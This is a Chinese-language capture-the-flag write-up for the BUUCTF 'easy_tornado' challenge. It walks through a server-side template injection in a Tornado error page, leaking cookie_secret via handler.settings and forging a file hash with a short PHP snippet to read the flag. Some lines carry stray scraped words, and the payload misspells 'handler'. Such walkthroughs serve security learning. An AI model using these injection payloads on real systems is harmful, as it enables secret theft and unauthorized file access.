有關於服務端模板注入(ssti攻擊)——BUUCTF - easy_tornado
打開題目出現3個連接
php
/flag.txt 中提示flag in /fllllllllllllagnode
/welcome.txt 中提示 renderpython
/hints.txt 中提示 md5(cookie_secret+md5(filename))cookie
直接訪問/fllllllllllllag失敗。tornado
百度了render可知,render是python的一個模板,他們的url都是由filename和filehash組成,filehash即爲他們filename的md5值。url
當filename或filehash不匹配時,將會跳轉到http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/error?msg=Error 頁面.spa
因此想到須要獲取cookie_secret來獲得filehashblog
存在msg參數,百度以後發現師傅們能夠進行模塊注入。嘗試了error?msg={{1}},發現的確存在模塊注入。md5
嘗試搜索tornado cookie_secret。發現cookie_secret存放在handler.settings中。hash
因而構建payload
http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/error?msg={{hendler_settings}}
獲得'cookie_secret': '2cdad0e1-16ac-4881-861a-daecaa637c2c'
因而用php寫代碼獲取filehash值
<?php
$cookie_secret='2cdad0e1-16ac-4881-861a-daecaa637c2c';
$filename = '/fllllllllllllag';
$go = md5($cookie_secret . md5($filename));
echo $go;
?>
再次構建payload
http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/file?filename=/fllllllllllllag&filehash=98b8d02691da0221fc3fc43498a181d4
獲得flag
相關文章
- 1. 初識SSTI(服務端模板注入攻擊)
- 2. 模板注入(SSTI)攻擊(jinja2)
- 3. SSTI-服務端模板注入漏洞
- 4. CTF SSTI(服務器模板注入)
- 5. SSTI (服務器模板注入)
- 6. SSTI(模板注入)
- 7. SSTI模板注入
- 8. Flask(Jinja2) 服務端模板注入漏洞(SSTI)
- 9. WEB服務端安全---注入攻擊
- 10. 護網杯-easy_tornado
- 更多相關文章...
- • 服務端腳本 指南 - 網站建設指南
- • XSLT - 在服務器端 - XSLT 教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
- • NewSQL-TiDB相關
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 初識SSTI(服務端模板注入攻擊)
- 2. 模板注入(SSTI)攻擊(jinja2)
- 3. SSTI-服務端模板注入漏洞
- 4. CTF SSTI(服務器模板注入)
- 5. SSTI (服務器模板注入)
- 6. SSTI(模板注入)
- 7. SSTI模板注入
- 8. Flask(Jinja2) 服務端模板注入漏洞(SSTI)
- 9. WEB服務端安全---注入攻擊
- 10. 護網杯-easy_tornado